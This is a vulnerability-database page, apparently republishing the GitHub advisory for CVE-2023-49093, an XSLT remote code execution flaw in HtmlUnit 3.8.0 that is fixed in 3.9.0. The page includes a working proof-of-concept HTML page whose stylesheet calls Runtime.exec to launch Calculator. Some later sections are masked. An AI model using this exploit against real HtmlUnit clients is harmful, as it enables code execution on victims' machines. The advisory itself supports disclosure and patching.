9.8

CVSS Score

3.1

Basic Information

CVE ID

CVE-2023-49093

GHSA ID

GHSA-37vq-hr2f-g7h7

EPSS Score

0.89388%

CWE

CWE-94

Published

12/4/2023

Updated

12/4/2023

KEV Status

Technology

Java

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2023-49093

CVE-2023-49093: HtmlUnit vulnerable to Remote Code Execution (RCE) via XSTL

Summary

HtmlUnit 3.8.0 are vulnerable to Remote Code Execution (RCE) via XSTL, when browsing the attacker’s webpage

Details

Vulnerability code location: org.htmlunit.activex.javascript.msxml.XSLProcessor#transform(org.htmlunit.activex.javascript.msxml.XMLDOMNode)

The reason for the vulnerability is that it was not enabled FEATURE_SECURE_PROCESSING for the XSLT processor

PoC

pom.xml:

<dependency>
  <groupId>org.htmlunit</groupId>
  <artifactId>htmlunit</artifactId>
  <version>3.8.0</version>
</dependency>

code:

WebClient webClient = new WebClient(BrowserVersion.INTERNET_EXPLORER);
HtmlPage page = webClient.getPage("http://127.0.0.1:8080/test.html");
System.out.println(page.asNormalizedText());

test.html:

<script>
    var xslt = new ActiveXObject("Msxml2.XSLTemplate.6.0");
    var xslDoc = new ActiveXObject("Msxml2.FreeThreadedDOMDocument.6.0");
    var xslProc;
    xslDoc.async = false;
    xslDoc.loadXML(`<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object">
   <xsl:template match="/">
     <xsl:variable name="rtobject" select="rt:getRuntime()"/>
     <xsl:variable name="process" select="rt:exec($rtobject,'open -a Calculator')"/>
     <xsl:variable name="processString" select="ob:toString($process)"/>
     <span><xsl:value-of select="$processString"/></span>
   </xsl:template>
 </xsl:stylesheet>`)

    if (xslDoc.parseError.errorCode != 0) {
        var myErr = xslDoc.parseError;
        document.write("ParseError: "+myErr.reason);
    } else {
        xslt.stylesheet = xslDoc;
        var xmlDoc = new ActiveXObject("Msxml2.DOMDocument.6.0");
        xmlDoc.async = false;
        xmlDoc.loadXML("<s></s>");
        if (xmlDoc.parseError.errorCode != 0) {
            var myErr = xmlDoc.parseError;
            document.write("Document error: " + myErr.reason);
        } else {
            xslProc = xslt.createProcessor();
            xslProc.input = xmlDoc;
            xslProc.transform();
            document.write(xslProc.output);
        }
    }
</script>

Impact

Remote Code Execution

(GitHub Advisory)

9.8

CVSS Score

3.1

Basic Information

CVE ID

CVE-2023-49093

GHSA ID

GHSA-37vq-hr2f-g7h7

EPSS Score

0.89388%

CWE

CWE-94

Published

12/4/2023

Updated

12/4/2023

KEV Status

Technology

Java

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
org.htmlunit:htmlunit	maven	< 3.9.0	3.9.0

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerable function is identified based on the description of the vulnerability and its location in the HtmlUnit codebase. The transform method in XSLProcessor is directly implicated in the vulnerability due to its role in processing XSL transformations without secure processing features enabled.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

### Summ*ry *tmlUnit *.*.* *r* vuln*r**l* to R*mot* *o** *x**ution (R**) vi* XSTL, w**n *rowsin* t** *tt**k*r’s w**p*** ### **t*ils Vuln*r**ility *o** lo**tion: or*.*tmlunit.**tiv*x.j*v*s*ript.msxml.XSLPro**ssor#tr*ns*orm(or*.*tmlunit.**tiv*x.j*v*s*

Reasoning

T** vuln*r**l* `*un*tion` is i**nti*i** **s** on t** **s*ription o* t** vuln*r**ility *n* its lo**tion in t** `*tmlUnit` *o****s*. T** `tr*ns*orm` m*t*o* in `XSLPro**ssor` is *ir**tly impli**t** in t** vuln*r**ility *u* to its rol* in pro**ssin* XSL

9.8

Basic Information

Concerned about an active attack path?

CVE-2023-49093: HtmlUnit vulnerable to Remote Code Execution (RCE) via XSTL

Summary

Details

PoC

Impact

9.8

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI